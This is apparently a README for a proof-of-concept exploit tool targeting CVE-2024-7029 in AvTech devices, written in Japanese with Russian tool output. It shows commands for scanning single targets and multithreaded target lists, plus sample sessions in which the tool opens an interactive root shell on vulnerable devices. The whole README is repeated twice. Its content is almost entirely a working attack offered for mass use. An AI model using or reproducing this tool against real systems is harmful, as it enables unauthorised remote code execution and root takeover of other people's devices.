
PoCエクスプロイト for CVE-2024-7029 in AvTechデバイス。脆弱なターゲットをスキャンし、マルチスレッドスキャンによるコマンド実行のための対話型リモートシェルを提供します。
GenAvTechRCEExploit AvTechデバイスで発見されたCVE-2024-7029脆弱性に対するPoCエクスプロイトで、リモートコード実行(RCE)を可能にします。このツールは、脆弱なデバイスをスキャンし、インタラクティブにコマンドを実行できます。
requestsライブラリprompt_toolkitライブラリalive_progressライブラリ必要なライブラリをインストールするには:
pip install -r requirements.txt
単一のターゲットの脆弱性を確認し、対話型シェルを起動するには:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
<target_url> を実際のターゲットデバイスのURLに置き換えてください。
ファイル内の複数のターゲットをスキャンするには(1行に1つのURL):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
<file_path> をターゲットURLを含むファイルのパスに置き換えてください。
-t オプションを使用して、スキャンするスレッド数を指定できます:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
デフォルトでは、スレッド数は10に設定されています。
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
GenAvTechRCEExploit - AvTechデバイスにおけるCVE-2024-7029のエクスプロイトで、リモートコード実行(RCE)を可能にします。このツールは、脆弱なデバイスをスキャンし、インタラクティブモードでコマンドを実行できます。
requestsライブラリprompt_toolkitライブラリalive_progressライブラリ必要なライブラリは次を使用してインストールできます:
pip install -r requirements.txt
単一のターゲットの脆弱性を確認し、対話型シェルを起動するには:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
<target_url> を実際のターゲットデバイスのURLに置き換えてください。
ファイル内の複数のターゲットをスキャンするには(1行に1つのURL):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
<file_path> をターゲットURLを含むファイルのパスに置き換えてください。
-t オプションを使用して、スキャンするスレッド数を指定できます:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
デフォルトでは、スレッド数は10に設定されています。
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20